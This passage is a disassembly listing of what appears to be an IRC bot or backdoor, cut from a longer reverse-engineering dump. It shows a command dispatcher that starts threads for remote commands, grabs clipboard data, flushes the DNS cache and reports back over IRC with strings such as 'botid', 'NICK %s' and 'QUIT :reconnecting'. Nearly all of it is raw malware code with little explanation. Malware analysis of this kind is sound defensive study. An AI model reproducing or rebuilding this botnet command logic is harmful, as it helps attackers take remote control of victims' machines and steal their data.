add esp, 20h
mov [ebp+var_5F4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_800]
push ebx
push eax
push offset sub_406C19
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_5F4]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_41421D
loc_414207: ; CODE XREF: sub_40EE72+53A9�j
cmp [ebp+var_560], ebx
jnz loc_410E57
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_414207
; ---------------------------------------------------------------------------
loc_41421D: ; CODE XREF: sub_40EE72+5393�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_4301E0
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_41422E: ; CODE XREF: sub_40EE72+18CD�j
; sub_40EE72+18E2�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_41424D
push edi
call sub_41781F
test eax, eax
pop ecx
jz short loc_41424D
push edi
call sub_41781F
pop ecx
jmp short loc_414252
; ---------------------------------------------------------------------------
loc_41424D: ; CODE XREF: sub_40EE72+53C5�j
; sub_40EE72+53D0�j
mov eax, ds:dword_42F5B0
loc_414252: ; CODE XREF: sub_40EE72+53D9�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_57C], eax
xor eax, eax
cmp [ebp+var_9C4], bl
setz al
cmp esi, ebx
mov [ebp+var_568], eax
jz short loc_414285
lea eax, [ebp+var_680]
push esi
push eax
call sub_4172B0
pop ecx
pop ecx
jmp short loc_4142B0
; ---------------------------------------------------------------------------
loc_414285: ; CODE XREF: sub_40EE72+5400�j
lea eax, [ebp+var_3FC]
push 104h
push eax
call ds:dword_424068 ;; GetSystemDirectoryA
push ebx
push ebx
lea eax, [ebp+var_2E8]
push ebx
push eax
lea eax, [ebp+var_3FC]
push eax
call sub_4192B8
add esp, 14h
loc_4142B0: ; CODE XREF: sub_40EE72+5411�j
lea eax, [ebp+var_680]
push eax
call sub_417AB0
cmp [ebp+eax+var_681], 5Ch
pop ecx
jnz short loc_4142DB
lea eax, [ebp+var_680]
push eax
call sub_417AB0
pop ecx
mov [ebp+eax+var_681], bl
loc_4142DB: ; CODE XREF: sub_40EE72+5453�j
push [ebp+var_8C]
mov esi, [ebp+arg_4]
lea eax, [ebp+var_908]
mov [ebp+var_90C], esi
push 80h
push eax
call sub_41782A
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_680]
mov [ebp+var_570], edi
push eax
push [ebp+var_57C]
push esi
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_42B20C
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 3
push eax
call sub_416D5C
add esp, 20h
mov [ebp+var_574], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_90C]
push ebx
push eax
push offset sub_405AF2
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_574]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_414393
loc_41437D: ; CODE XREF: sub_40EE72+551F�j
cmp [ebp+var_560], ebx
jnz loc_4144E5
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_41437D
; ---------------------------------------------------------------------------
loc_414393: ; CODE XREF: sub_40EE72+5509�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_430198
jmp loc_4144D6
; ---------------------------------------------------------------------------
loc_4143A4: ; CODE XREF: sub_40EE72+18A3�j
; sub_40EE72+18B8�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_4143C3
push edi
call sub_41781F
test eax, eax
pop ecx
jz short loc_4143C3
push edi
call sub_41781F
pop ecx
jmp short loc_4143C8
; ---------------------------------------------------------------------------
loc_4143C3: ; CODE XREF: sub_40EE72+553B�j
; sub_40EE72+5546�j
mov eax, ds:dword_42F5B4
loc_4143C8: ; CODE XREF: sub_40EE72+554F�j
mov [ebp+var_578], eax
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
jnz short loc_4143DF
lea eax, [ebp+var_D8]
loc_4143DF: ; CODE XREF: sub_40EE72+5565�j
push eax
lea eax, [ebp+var_6B8]
push 40h
push eax
call sub_41782A
mov esi, [ebp+esi+var_88]
add esp, 0Ch
cmp esi, ebx
jnz short loc_414401
mov esi, offset byte_436EDC
loc_414401: ; CODE XREF: sub_40EE72+5588�j
push esi
lea eax, [ebp+var_678]
push 100h
push eax
call sub_41782A
add esp, 0Ch
lea eax, [ebp+var_738]
push [ebp+var_8C]
push 80h
push eax
call sub_41782A
mov eax, [ebp+var_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_564], eax
lea eax, [ebp+var_6B8]
push eax
mov [ebp+var_73C], esi
push [ebp+var_578]
mov [ebp+var_568], edi
push esi
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset dword_43014C
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 6
push eax
call sub_416D5C
add esp, 20h
mov [ebp+var_574], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_73C]
push ebx
push eax
push offset sub_41570E
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_574]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_4144CA
loc_4144B8: ; CODE XREF: sub_40EE72+5656�j
cmp [ebp+var_560], ebx
jnz short loc_4144E5
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_4144B8
; ---------------------------------------------------------------------------
loc_4144CA: ; CODE XREF: sub_40EE72+5644�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_430100
loc_4144D6: ; CODE XREF: sub_40EE72+3625�j
; sub_40EE72+3722�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
add esp, 0Ch
loc_4144E5: ; CODE XREF: sub_40EE72+3609�j
; sub_40EE72+3706�j ...
cmp [ebp+var_8], ebx
jnz loc_414E11
push ebx
push edi
jmp loc_411D2F
; ---------------------------------------------------------------------------
loc_4144F5: ; CODE XREF: sub_40EE72+1879�j
; sub_40EE72+188E�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_414508
push esi
call sub_41781F
jmp short loc_41450F
; ---------------------------------------------------------------------------
loc_414508: ; CODE XREF: sub_40EE72+568C�j
push 8
call sub_416FC3
loc_41450F: ; CODE XREF: sub_40EE72+5694�j
cmp eax, ebx
pop ecx
jz loc_414F47
push eax
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_4071DB
loc_41452A: ; CODE XREF: sub_40EE72+5B67�j
add esp, 10h
jmp loc_414F47
; ---------------------------------------------------------------------------
loc_414532: ; CODE XREF: sub_40EE72+184F�j
; sub_40EE72+1864�j
mov eax, ds:dword_43ACC0
cmp eax, ebx
jz short loc_41454F
call eax ; DnsFlushResolverCache
test eax, eax
jz short loc_414548
push offset unk_4300CC
jmp short loc_414564
; ---------------------------------------------------------------------------
loc_414548: ; CODE XREF: sub_40EE72+56CD�j
push offset unk_430090
jmp short loc_414564
; ---------------------------------------------------------------------------
loc_41454F: ; CODE XREF: sub_40EE72+56C7�j
push offset dword_430054
jmp short loc_414564
; ---------------------------------------------------------------------------
loc_414556: ; CODE XREF: sub_40EE72+1825�j
; sub_40EE72+183A�j
call sub_40AE02
test eax, eax
jz short loc_41457A
push offset dword_430020
loc_414564: ; CODE XREF: sub_40EE72+4AFC�j
; sub_40EE72+56D4�j ...
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
jmp loc_4110BD
; ---------------------------------------------------------------------------
loc_41457A: ; CODE XREF: sub_40EE72+56EB�j
push offset unk_42FFE4
jmp short loc_414564
; ---------------------------------------------------------------------------
loc_414581: ; CODE XREF: sub_40EE72+17FB�j
; sub_40EE72+1810�j
cmp [ebp+var_8], ebx
jnz short loc_4145A0
push ebx
push [ebp+var_4]
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_4145A0: ; CODE XREF: sub_40EE72+5712�j
push ebx
push [ebp+var_4]
call sub_40AABF
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
push offset dword_42FFA4
loc_4145BD: ; CODE XREF: sub_40EE72+5A09�j
; sub_40EE72+5A3B�j
call sub_40BF6D
add esp, 18h
jmp loc_414F47
; ---------------------------------------------------------------------------
loc_4145CA: ; CODE XREF: sub_40EE72+171C�j
; sub_40EE72+1731�j
push 7
call sub_416FA4
test eax, eax
pop ecx
jle short loc_4145DD
push offset dword_42FF6C
jmp short loc_4145FE
; ---------------------------------------------------------------------------
loc_4145DD: ; CODE XREF: sub_40EE72+5762�j
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40B56C
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_4145F9
push offset dword_42FF34
jmp short loc_4145FE
; ---------------------------------------------------------------------------
loc_4145F9: ; CODE XREF: sub_40EE72+577E�j
push offset dword_42FF04
loc_4145FE: ; CODE XREF: sub_40EE72+2C51�j
; sub_40EE72+2D87�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
pop ecx
pop ecx
loc_41460C: ; CODE XREF: sub_40EE72+15C6�j
; sub_40EE72+2D61�j ...
cmp [ebp+var_8], ebx
jnz loc_414E11
push ebx
push [ebp+var_4]
loc_414619: ; CODE XREF: sub_40EE72+3961�j
lea eax, [ebp+var_2DC]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
loc_414629: ; CODE XREF: sub_40EE72+2ECB�j
call sub_40D679
add esp, 14h
jmp loc_414E11
; ---------------------------------------------------------------------------
loc_414636: ; CODE XREF: sub_40EE72+16F2�j
; sub_40EE72+1707�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40A4AC
jmp loc_40F236
; ---------------------------------------------------------------------------
loc_41464F: ; CODE XREF: sub_40EE72+16C8�j
; sub_40EE72+16DD�j
push [ebp+esi+var_90]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D320
jmp loc_40F236
; ---------------------------------------------------------------------------
loc_41466C: ; CODE XREF: sub_40EE72+169E�j
; sub_40EE72+16B3�j
or edi, 0FFFFFFFFh
call ds:dword_424058 ;; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, [ebp+esi+var_90]
cmp esi, ebx
mov [ebp+arg_0], eax
jz short loc_414695
push esi
call sub_41781F
pop ecx
mov edi, eax
loc_414695: ; CODE XREF: sub_40EE72+5818�j
mov eax, [ebp+arg_0]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_4146AE
cmp edi, 0FFFFFFFFh
jnz loc_414F47
loc_4146AE: ; CODE XREF: sub_40EE72+5831�j
push ebx
call sub_40B721
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset dword_42FEDC
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
jmp loc_411A5D
; ---------------------------------------------------------------------------
loc_4146F1: ; CODE XREF: sub_40EE72+1674�j
; sub_40EE72+1689�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_408C26
add esp, 0Ch
push offset unk_42FEAC
jmp loc_410D38
; ---------------------------------------------------------------------------
loc_41470F: ; CODE XREF: sub_40EE72+164A�j
; sub_40EE72+165F�j
push 1Fh
call sub_416FA4
test eax, eax
pop ecx
jle short loc_414738
cmp [ebp+var_8], ebx
jnz loc_40F239
push ebx
push [ebp+var_4]
push offset unk_42FE78
push [ebp+var_8C]
jmp loc_40F7A0
; ---------------------------------------------------------------------------
loc_414738: ; CODE XREF: sub_40EE72+58A7�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_41782A
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_90]
mov [ebp+var_4F4], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_464], eax
mov [ebp+var_46C], ebx
jz short loc_414799
push esi
push offset aFull ; "full"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_414799
mov [ebp+var_46C], 1
loc_414799: ; CODE XREF: sub_40EE72+590A�j
; sub_40EE72+591B�j
lea eax, [ebp+var_2DC]
push offset dword_42FE40
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 1Fh
push eax
call sub_416D5C
add esp, 14h
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_41533B
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_414807
loc_4147F1: ; CODE XREF: sub_40EE72+5993�j
cmp [ebp+var_460], ebx
jnz loc_414E11
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_4147F1
; ---------------------------------------------------------------------------
loc_414807: ; CODE XREF: sub_40EE72+597D�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_42FDF0
jmp loc_414E02
; ---------------------------------------------------------------------------
loc_414818: ; CODE XREF: sub_40EE72+1620�j
; sub_40EE72+1635�j
cmp [ebp+var_8], ebx
jnz short loc_414837
push ebx
push [ebp+var_4]
push offset dword_42FDC8
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_414837: ; CODE XREF: sub_40EE72+59A9�j
push [ebp+arg_4]
call ds:dword_43AE30 ;; closesocket
call ds:dword_43ACF8 ;; WSACleanup
call sub_40AC42
push ebx
call ds:off_42414C
loc_414852: ; CODE XREF: sub_40EE72+15F6�j
; sub_40EE72+160B�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push [ebp+arg_4]
push eax
call sub_40B8D8
pop ecx
pop ecx
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
push offset dword_42FDA0
jmp loc_4145BD
; ---------------------------------------------------------------------------
loc_414880: ; CODE XREF: sub_40EE72+14BC�j
; sub_40EE72+14D1�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_40BB8C
add esp, 0Ch
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
push offset dword_42FD78
jmp loc_4145BD
; ---------------------------------------------------------------------------
loc_4148B2: ; CODE XREF: sub_40EE72+1492�j
; sub_40EE72+14A7�j
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40C00D
jmp loc_40F236
; ---------------------------------------------------------------------------
loc_4148CB: ; CODE XREF: sub_40EE72+1468�j
; sub_40EE72+147D�j
cmp [ebp+var_C], ebx
mov [ebp+var_388], bl
jz short loc_41490A
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_41490A
push esi
push [ebp+var_C]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz short loc_41490A
push eax
push offset aS_3 ; "%s"
lea eax, [ebp+var_388]
push 80h
push eax
call sub_41782A
add esp, 10h
loc_41490A: ; CODE XREF: sub_40EE72+5A62�j
; sub_40EE72+5A6D�j ...
push [ebp+var_8C]
lea eax, [ebp+var_408]
push 80h
push eax
call sub_41782A
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_40C], eax
mov eax, [ebp+var_4]
mov [ebp+var_304], eax
mov eax, [ebp+var_8]
mov [ebp+var_300], eax
lea eax, [ebp+var_2DC]
push offset dword_42FD50
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 1Dh
push eax
call sub_416D5C
add esp, 14h
mov [ebp+var_308], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_40C]
push ebx
push eax
push offset sub_40C07F
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_308]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_4149AD
loc_414997: ; CODE XREF: sub_40EE72+5B39�j
cmp [ebp+var_2FC], ebx
jnz loc_40F239
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_414997
; ---------------------------------------------------------------------------
loc_4149AD: ; CODE XREF: sub_40EE72+5B23�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_42FD08
jmp loc_40F422
; ---------------------------------------------------------------------------
loc_4149BE: ; CODE XREF: sub_40EE72+143E�j
; sub_40EE72+1453�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40BEF5
push offset dword_42FCE0
call sub_40BF6D
jmp loc_41452A
; ---------------------------------------------------------------------------
loc_4149DE: ; CODE XREF: sub_40EE72+1414�j
; sub_40EE72+1429�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_41782A
mov eax, [ebp+arg_4]
mov esi, [ebp+esi+var_90]
mov [ebp+var_4F4], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
add esp, 0Ch
cmp esi, ebx
mov [ebp+var_464], eax
jz short loc_414A38
push offset dword_42FCDC
push esi
call sub_4176D0
neg eax
sbb eax, eax
pop ecx
inc eax
pop ecx
mov [ebp+var_46C], eax
jmp short loc_414A3E
; ---------------------------------------------------------------------------
loc_414A38: ; CODE XREF: sub_40EE72+5BAA�j
mov [ebp+var_46C], ebx
loc_414A3E: ; CODE XREF: sub_40EE72+5BC4�j
lea eax, [ebp+var_2DC]
push offset dword_42FCB0
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 20h
push eax
call sub_416D5C
add esp, 14h
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_416DC7
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_414AA8
loc_414A96: ; CODE XREF: sub_40EE72+5C34�j
cmp [ebp+var_460], ebx
jnz short loc_414AC3
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_414A96
; ---------------------------------------------------------------------------
loc_414AA8: ; CODE XREF: sub_40EE72+5C22�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_42FC68
loc_414AB4: ; CODE XREF: sub_40EE72+489D�j
; sub_40EE72+49B9�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
add esp, 0Ch
loc_414AC3: ; CODE XREF: sub_40EE72+4527�j
; sub_40EE72+453F�j ...
lea eax, [ebp+var_2DC]
push eax
jmp loc_410654
; ---------------------------------------------------------------------------
loc_414ACF: ; CODE XREF: sub_40EE72+1398�j
; sub_40EE72+13AD�j
push offset aBotid ; "botid"
push offset dword_42FC40
jmp short loc_414AED
; ---------------------------------------------------------------------------
loc_414ADB: ; CODE XREF: sub_40EE72+136E�j
; sub_40EE72+1383�j
push ds:dword_4CD5F0
call sub_40B721
pop ecx
push eax
push offset dword_42FC04
loc_414AED: ; CODE XREF: sub_40EE72+5C67�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 20h
jmp loc_4110FD
; ---------------------------------------------------------------------------
loc_414B1A: ; CODE XREF: sub_40EE72+1344�j
; sub_40EE72+1359�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_414B4C
cmp [ebp+var_C], ebx
jz short loc_414B5B
push esi
push [ebp+var_C]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz short loc_414B5B
push eax
push offset aQuitS ; "QUIT :%s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
jmp short loc_414B5B
; ---------------------------------------------------------------------------
loc_414B4C: ; CODE XREF: sub_40EE72+5CB1�j
push offset aQuitLater ; "QUIT :later\r\n"
push [ebp+arg_4]
call sub_40D633
pop ecx
pop ecx
loc_414B5B: ; CODE XREF: sub_40EE72+5CB6�j
; sub_40EE72+5CC5�j ...
push 0FFFFFFFEh
jmp loc_40F23B
; ---------------------------------------------------------------------------
loc_414B62: ; CODE XREF: sub_40EE72+131A�j
; sub_40EE72+132F�j
push offset aQuitDisconnect ; "QUIT :disconnecting\r\n"
push [ebp+arg_4]
call sub_40D633
push offset dword_42FBB4
call sub_40BF6D
add esp, 0Ch
or eax, 0FFFFFFFFh
jmp loc_40F23C
; ---------------------------------------------------------------------------
loc_414B84: ; CODE XREF: sub_40EE72+12F0�j
; sub_40EE72+1305�j
push offset aQuitReconnecti ; "QUIT :reconnecting\r\n"
push [ebp+arg_4]
call sub_40D633
push offset dword_42FB74
call sub_40BF6D
add esp, 0Ch
xor eax, eax
jmp loc_40F23C
; ---------------------------------------------------------------------------
loc_414BA5: ; CODE XREF: sub_40EE72+12C6�j
; sub_40EE72+12DB�j
push [ebp+var_4]
push [ebp+var_8C]
push [ebp+arg_4]
call sub_407110
jmp loc_412FF4
; ---------------------------------------------------------------------------
loc_414BBB: ; CODE XREF: sub_40EE72+1221�j
; sub_40EE72+1236�j
push [ebp+esi+var_90]
push 1Fh
push offset dword_42FB64
push offset dword_42FB58
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_414BD3: ; CODE XREF: sub_40EE72+11F7�j
; sub_40EE72+120C�j
push [ebp+esi+var_90]
push 1Ch
push offset dword_42FB4C
push offset dword_42FB3C
jmp loc_40FED3
; ---------------------------------------------------------------------------
loc_414BEB: ; CODE XREF: sub_40EE72+1022�j
; sub_40EE72+1037�j
mov edi, [ebp+esi+var_90]
cmp edi, ebx
jz short loc_414C0A
push edi
call sub_41781F
test eax, eax
pop ecx
jz short loc_414C0A
push edi
call sub_41781F
pop ecx
jmp short loc_414C0F
; ---------------------------------------------------------------------------
loc_414C0A: ; CODE XREF: sub_40EE72+5D82�j
; sub_40EE72+5D8D�j
mov eax, ds:dword_42F5A8
loc_414C0F: ; CODE XREF: sub_40EE72+5D96�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_478], eax
cmp esi, ebx
jz short loc_414C34
push esi
loc_414C21: ; CODE XREF: sub_40EE72+5DD1�j
lea eax, [ebp+var_488]
push 10h
push eax
call sub_41782A
add esp, 0Ch
jmp short loc_414C4B
; ---------------------------------------------------------------------------
loc_414C34: ; CODE XREF: sub_40EE72+5DAC�j
cmp [ebp+var_9C7], bl
jz short loc_414C45
lea eax, [ebp+var_D8]
push eax
jmp short loc_414C21
; ---------------------------------------------------------------------------
loc_414C45: ; CODE XREF: sub_40EE72+5DC8�j
mov [ebp+var_488], bl
loc_414C4B: ; CODE XREF: sub_40EE72+5DC0�j
mov eax, [ebp+var_4]
push [ebp+var_8C]
mov esi, [ebp+arg_4]
mov [ebp+var_46C], eax
mov eax, [ebp+var_8]
push 80h
mov [ebp+var_468], eax
lea eax, [ebp+var_508]
push eax
mov [ebp+var_50C], esi
call sub_41782A
add esp, 0Ch
push [ebp+var_478]
push esi
call sub_40AEE0
pop ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_42B75C
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 11h
push eax
call sub_416D5C
add esp, 1Ch
mov [ebp+var_474], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_50C]
push ebx
push eax
push offset sub_407FEA
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_474]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_414CFC
loc_414CE6: ; CODE XREF: sub_40EE72+5E88�j
cmp [ebp+var_464], ebx
jnz loc_40F239
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_414CE6
; ---------------------------------------------------------------------------
loc_414CFC: ; CODE XREF: sub_40EE72+5E72�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_42FAF4
jmp loc_40F422
; ---------------------------------------------------------------------------
loc_414D0D: ; CODE XREF: sub_40EE72+FCE�j
; sub_40EE72+FE3�j ...
push edi
push offset aSecure ; "secure"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_414D35
push edi
push offset aSec ; "sec"
call sub_4176D0
pop ecx
mov [ebp+var_46C], ebx
test eax, eax
pop ecx
jnz short loc_414D3F
loc_414D35: ; CODE XREF: sub_40EE72+5EAA�j
mov [ebp+var_46C], 1
loc_414D3F: ; CODE XREF: sub_40EE72+5EC1�j
push [ebp+var_8C]
lea eax, [ebp+var_4F0]
push 80h
push eax
call sub_41782A
mov eax, [ebp+arg_4]
add esp, 0Ch
cmp [ebp+var_46C], ebx
mov [ebp+var_4F4], eax
mov eax, [ebp+var_4]
mov [ebp+var_468], eax
mov eax, [ebp+var_8]
mov [ebp+var_464], eax
mov eax, offset aSecuring ; "Securing"
jnz short loc_414D86
mov eax, offset aUnsecuring ; "Unsecuring"
loc_414D86: ; CODE XREF: sub_40EE72+5F0D�j
push eax
push offset dword_42FAA8
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
push ebx
lea eax, [ebp+var_2DC]
push 1Ah
push eax
call sub_416D5C
add esp, 1Ch
mov [ebp+var_470], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4F4]
push ebx
push eax
push offset sub_415F28
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_470]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_414DF6
loc_414DE4: ; CODE XREF: sub_40EE72+5F82�j
cmp [ebp+var_460], ebx
jnz short loc_414E11
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_414DE4
; ---------------------------------------------------------------------------
loc_414DF6: ; CODE XREF: sub_40EE72+5F70�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_42FA5C
loc_414E02: ; CODE XREF: sub_40EE72+3DA5�j
; sub_40EE72+4AC1�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
add esp, 0Ch
loc_414E11: ; CODE XREF: sub_40EE72+2EB3�j
; sub_40EE72+3959�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
jmp loc_40F428
; ---------------------------------------------------------------------------
loc_414E22: ; CODE XREF: sub_40EE72+FA4�j
; sub_40EE72+FB9�j
push offset aAbosal7Tool ; "ABOSAL7 tool"
push offset dword_42FA3C
jmp loc_4110B1
; ---------------------------------------------------------------------------
loc_414E31: ; CODE XREF: sub_40EE72+F7A�j
; sub_40EE72+F8F�j
mov esi, [ebp+esi+var_90]
cmp esi, ebx
jz short loc_414E91
push esi
call sub_41781F
cmp eax, ebx
pop ecx
jl short loc_414E86
cmp eax, 2
jge short loc_414E86
mov edx, [ebp+arg_18]
mov ecx, eax
shl ecx, 7
cmp [ecx+edx], bl
lea esi, [ecx+edx]
jz short loc_414E7B
lea eax, [esi+1]
push eax
lea eax, [ebp+var_2DC]
push offset dword_432E04
push eax
call sub_4172B0
add esp, 0Ch
mov [esi], bl
jmp loc_410E57
; ---------------------------------------------------------------------------
loc_414E7B: ; CODE XREF: sub_40EE72+5FE8�j
push eax
push offset dword_42FA00
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_414E86: ; CODE XREF: sub_40EE72+5FD3�j
; sub_40EE72+5FD8�j
push eax
push offset dword_42F9C4
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_414E91: ; CODE XREF: sub_40EE72+5FC8�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_414E96: ; CODE XREF: sub_40EE72+6040�j
push [ebp+var_94]
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_414EB9
inc esi
add edi, 80h
cmp esi, 2
jl short loc_414E96
jmp loc_410E57
; ---------------------------------------------------------------------------
loc_414EB9: ; CODE XREF: sub_40EE72+6034�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_D8]
push eax
push offset dword_432E04
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_414ED3: ; CODE XREF: sub_40EE72+F50�j
; sub_40EE72+F65�j
push [ebp+var_90]
push offset dword_432D74
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_414F47
call sub_416F25
push ebx
call ds:off_42414C
loc_414EF5: ; CODE XREF: sub_40EE72+F26�j
; sub_40EE72+F3B�j
push [ebp+esi+var_90]
xor eax, eax
cmp [ebp+var_9B8], bl
setnz al
push eax
lea eax, [ebp+var_928]
push ds:dword_42F5CC
push eax
call sub_415D01
add esp, 10h
lea eax, [ebp+var_928]
push eax
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
lea eax, [ebp+var_928]
push eax
push offset dword_42F990
loc_414F40: ; CODE XREF: sub_40EE72+4344�j
; sub_40EE72+49D7�j ...
call sub_40BFE1
pop ecx
loc_414F46: ; CODE XREF: sub_40EE72+17E7�j
pop ecx
loc_414F47: ; CODE XREF: sub_40EE72+65F�j
; sub_40EE72+66B�j ...
mov eax, [ebp+arg_24]
jmp loc_40F23C
; ---------------------------------------------------------------------------
loc_414F4F: ; CODE XREF: sub_40EE72+B28�j
; sub_40EE72+B3B�j
